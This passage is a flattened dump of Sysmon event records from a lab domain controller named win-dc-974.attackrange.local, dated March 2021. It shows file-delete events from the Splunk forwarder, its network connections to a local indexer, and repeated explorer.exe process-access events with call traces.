Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDC867CF2406B98B2D913AE3C7E11EF4,SHA256=8180A1ED6B469D0B6E579840BEC9B2A74A12AD96AAC39FABEACCE08828E91914,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:22.248{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2486E976AD3255383EB272040F257E06,SHA256=F064F0E41B56F5073C6B8B6143BBFC5B951FF5B6897DDFCBD125E9022A0E81A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:22.248{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDE017593F6B4E3904C25C229587D069,SHA256=127B28DF736CD0D8616EB16D8080F1707303682F095CF60C37E7081462CA80F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:22.029{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96BBAC3B2AABC233C85A2EB9D0C65917,SHA256=923C9846FEC6105124435816F37892069B99A0BE44FD9882EFFCD1281C9ECD63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:23.654{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2486E976AD3255383EB272040F257E06,SHA256=F064F0E41B56F5073C6B8B6143BBFC5B951FF5B6897DDFCBD125E9022A0E81A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002240910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:12.383{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60150-false10.0.1.12-8000- 23542300x80000000000000002240909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:23.064{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7706F19E6344AB83B732111075E8FB07,SHA256=A220BEAB3F0BE69B5C428E41DD7047CF6917FFF7F21095357BAB7301ACCA799E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:24.123{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CB1677906C3468780669D305DFF0E80,SHA256=79F3A45CB143278D164DF112379D65052EBA90EC79F3BC64A4347D24BFF9FBB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:25.404{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6058E63D5240785CFB23A0417C4E7AB2,SHA256=6C0F9E43034C1CC64B4EC5A93D57AA535F0358775362C4A1731D4ACC2871F490,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:25.139{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84289DF7964035DED84C12B38BFB081E,SHA256=FBB671DBD2F8F0B3FC9B85C492E5A1853EB88FFFF8A72249E14A55D23B9DC244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:26.675{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8411377A74335D94C3EE790FE96E5FC,SHA256=FA560DBED04867F03B103BE87A8943FEED6E36020BCB5DDC0B2CA3936C2196FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:26.186{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A82A4984770F983238A45F7BB3B3EEFA,SHA256=166EED65092CD743A74CA5E493EFDBA9127521E4142D277C6132403C8FD6E677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:27.267{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89772B5D2A593DD27915745729E6CE05,SHA256=A2D6A7B1D2B6F4F70B2C351081FC75F7D8BA780A0C209346EC50F165EDDEF7CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002240920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:17.413{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60151-false10.0.1.12-8000- 23542300x80000000000000002240919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:28.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC35DA9EB816AD9A8C804FCFCFBF9B86,SHA256=23874DD70CEFA1A403DD79F2668F35B642789E0EACC1E21C00B72FFA90D0731B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:28.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E21C00548C7A75CAA199CB52F5610741,SHA256=86F030C7BED68CE28060AC35547164820FAE4D01C33692247C0B51582F92B648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.975{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A46A2A4E7B7452905E62E6ED9405CB6,SHA256=2B568EF31ECA29299806F50625384F5584358CD62C2935FFC3656F1339AEBA56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002241725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 